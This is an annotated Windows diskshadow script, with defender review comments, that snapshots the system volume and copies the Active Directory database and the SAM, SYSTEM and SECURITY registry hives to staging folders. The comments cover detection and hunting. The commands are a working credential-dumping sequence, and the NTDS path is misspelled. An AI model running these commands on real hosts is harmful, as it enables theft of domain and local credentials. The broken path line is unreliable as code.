
# Review note (defender view): this listing drives the built-in Windows
# diskshadow utility to snapshot C:, mount the snapshot as Z:, and copy
# credential stores out of it that the running OS normally keeps locked.
# Copies of the AD database or of the SAM/SYSTEM/SECURITY hives allow offline
# recovery of credential material (MITRE ATT&CK T1003.003 and T1003.002), so
# an unplanned run of this sequence should be handled as credential compromise.
# Detection: record process creation with full command lines (Security event
# 4688 with command-line auditing, or Sysmon event 1) and alert on diskshadow
# outside approved backup jobs, on cmd.exe started by diskshadow, and on reads
# of these files through a shadow-copy volume or a newly exposed drive letter.
# Mitigation: keep local Administrators and backup-privileged accounts to a
# minimum, especially on domain controllers.
diskshadow

# Shadow copy survives diskshadow exit/reset, and is taken with all VSS
# writers excluded.
set context persistent nowriters
# Queue volume C: for the snapshot; the alias is referenced later as %myalias%.
add volume c: alias myalias
# Take the snapshot of the queued volume.
create
# Mount the snapshot as drive Z: so its files can be read like a normal volume.
expose %myalias% z:
# Each exec line below starts cmd.exe to copy one file from the snapshot to a
# local staging path. The curly quotes and the trailing parenthetical on the
# next line are the author's text as published, not diskshadow syntax.
# NOTE(review): build detections from the documented AD database location,
# not from the directory and file spelling used on this line.
exec “cmd.exe” /c copy z:\windows\ntdis\ntdis.dit c:\exfil\ntdis.fil (in case of a Domain Controller )

# Registry hive copies; files named sam/system/security appearing together in
# a staging directory such as c:\Temp are a useful hunting indicator.
exec “cmd.exe” /c copy z:\windows\System32\config\SAM c:\Temp\sam
exec “cmd.exe” /c copy z:\windows\System32\config\system c:\Temp\system
exec “cmd.exe” /c copy z:\windows\System32\config\security c:\Temp\security
# Requests deletion of the snapshot. Because the context is persistent, a
# snapshot that is not removed here stays on the host; during response, list
# existing shadow copies and check for unexpected ones (whether this argument
# form actually removes it is not verifiable from the page; confirm in a lab).
delete shadows volume %myalias%
# Return diskshadow to its default state, then leave the tool.
reset
exit
